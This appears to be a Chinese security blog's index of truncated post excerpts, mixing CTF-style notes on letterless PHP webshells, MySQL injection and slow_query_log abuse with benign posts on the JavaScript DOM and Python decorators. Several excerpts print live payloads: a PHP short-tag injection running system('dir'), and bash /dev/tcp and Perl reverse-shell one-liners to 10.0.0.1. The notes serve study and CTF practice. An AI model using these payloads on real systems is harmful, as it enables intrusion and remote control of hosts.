摘要:
无字母webshell-plus# Pation- 短标签不需要分号闭合?code=?><?=phpinfo()?><?=system("dir")?>- eval执行代码相当于另外生成一个php文件,文件格式为有<?php ..... ?>所以可以通过短标签摆脱;的限制- 异或和或运算时要将两个部 阅读全文
摘要:
JavaScript对象# Documetn<br />Document<br /><br />Document 接口表示任何在浏览器中载入的网页,并作为网页内容的入口,也就是DOM 树。DOM 树包含了像 <body> 、<table> 这样的元素,以及大量其他元素。它向网 阅读全文
摘要:
# 利用netcat反弹shellNetcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于 阅读全文
摘要:
@propertypyton内置的@property装饰器可以把一个方法变成一个属性python<br />class User:<br /> def __init__(self):<br />   阅读全文
摘要:
Bash 与linux发行版本有关<br />bash -i >& /dev/tcp/10.0.0.1/8080 0>&1<br />## PERL<br />perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_IN 阅读全文
摘要:
create_function()函数官方文档介绍示例代码:php<br /><?php<br />$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');<br />echo "Ne 阅读全文
摘要:
什么是软链接?<br /> 软连接是linux中一个常用命令,<br /> 它的功能是为某一个文件在另外一个位置建立一个同步的链接。<br /> 软连接类似与c语言中的指针,传递的是文件的地址;<br /> 更形象一些,软连接类似于WINDOWS系统中 阅读全文
摘要:
一个很久之前学习mysql注入的笔记#### (1)增删改查语句1. Insert : insert into mrkaixin values( ' 1’ , ' nepnep');2. Delete : delete from mrkaixin where xXXX;3. Update : upd 阅读全文
摘要:
是从深育杯一道mysql注入知道的使用示例 详细讲解<!--more--> 使用条件: 可以使用堆叠注入或slow_query_log开启(默认是关闭的) slow_query_log为慢查询记录开关 slow_query_log_file是查询语句的记录文件地址 以上参数参数可以通过set语句直接 阅读全文